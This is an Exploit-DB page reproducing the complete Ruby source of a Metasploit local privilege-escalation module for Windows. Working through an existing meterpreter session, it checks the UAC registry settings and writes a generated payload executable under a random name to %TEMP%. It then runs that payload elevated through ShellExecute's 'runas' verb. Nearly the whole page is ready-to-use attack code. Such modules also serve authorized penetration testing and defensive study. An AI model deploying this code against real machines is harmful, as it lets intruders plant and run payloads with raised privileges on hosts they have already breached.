Microsoft Windows - Escalate UAC Execute RunAs (Metasploit)

EDB-ID:

21843

CVE:


EDB Verified:

Author:

Metasploit

Type:

local

Exploit:   /  

Platform:

Windows

Date:

2012-10-10

Vulnerable App: 
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Local
	Rank = ExcellentRanking

	include Post::Common
	include Exploit::EXE
	include Post::File

	def initialize(info={})
		super( update_info( info,
			'Name'          => 'Windows Escalate UAC Execute RunAs',
			'Description'   => %q{
				This module will attempt to elevate execution level using
				the ShellExecute undocumented RunAs flag to bypass low
				UAC settings.
			},
			'License'       => MSF_LICENSE,
			'Author'        => [
					'mubix <mubix[at]hak5.org>' # Port to local exploit
				],
			'Version'       => '$Revision$',
			'Platform'      => [ 'windows' ],
			'SessionTypes'  => [ 'meterpreter' ],
			'Targets'       => [ [ 'Windows', {} ] ],
			'DefaultTarget' => 0,
			'References'    => [
				[ 'URL', 'http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html' ]
			],
			'DisclosureDate'=> "Jan 3, 2012"
		))

		register_options([
			OptString.new("FILENAME", [ false, "File name on disk"]),
			OptString.new("PATH", [ false, "Location on disk %TEMP% used if not set" ]),
			OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ])
		])

	end

	def exploit

		root_key, base_key = session.sys.registry.splitkey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System")
		open_key = session.sys.registry.open_key(root_key, base_key)
		lua_setting = open_key.query_value('EnableLUA')

		if lua_setting.data == 1
			print_status "UAC is Enabled, checking level..."
		else
			print_good "UAC is not enabled, no prompt for the user"
		end

		uac_level = open_key.query_value('ConsentPromptBehaviorAdmin')

		case uac_level.data
		when 2
			print_status "UAC is set to 'Always Notify'"
			print_status "The user will be prompted, wait for them to click 'Ok'"
		when 5
			print_debug "UAC is set to Default"
			print_debug "The user will be prompted, wait for them to click 'Ok'"
		when 0
			print_good "UAC is not enabled, no prompt for the user"
		end


		#
		# Generate payload and random names for upload
		#
		payload = generate_payload_exe

		if datastore["FILENAME"]
			payload_filename = datastore["FILENAME"]
		else
			payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
		end

		if datastore["PATH"]
			payload_path = datastore["PATH"]
		else
			payload_path = session.fs.file.expand_path("%TEMP%")
		end

		cmd_location = "#{payload_path}\\#{payload_filename}"

		if datastore["UPLOAD"]
			print_status("Uploading #{payload_filename} - #{payload.length} bytes to the filesystem...")
			fd = session.fs.file.new(cmd_location, "wb")
			fd.write(payload)
			fd.close
		end

		session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5)

	end
end
Tags: Metasploit Framework (MSF)
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services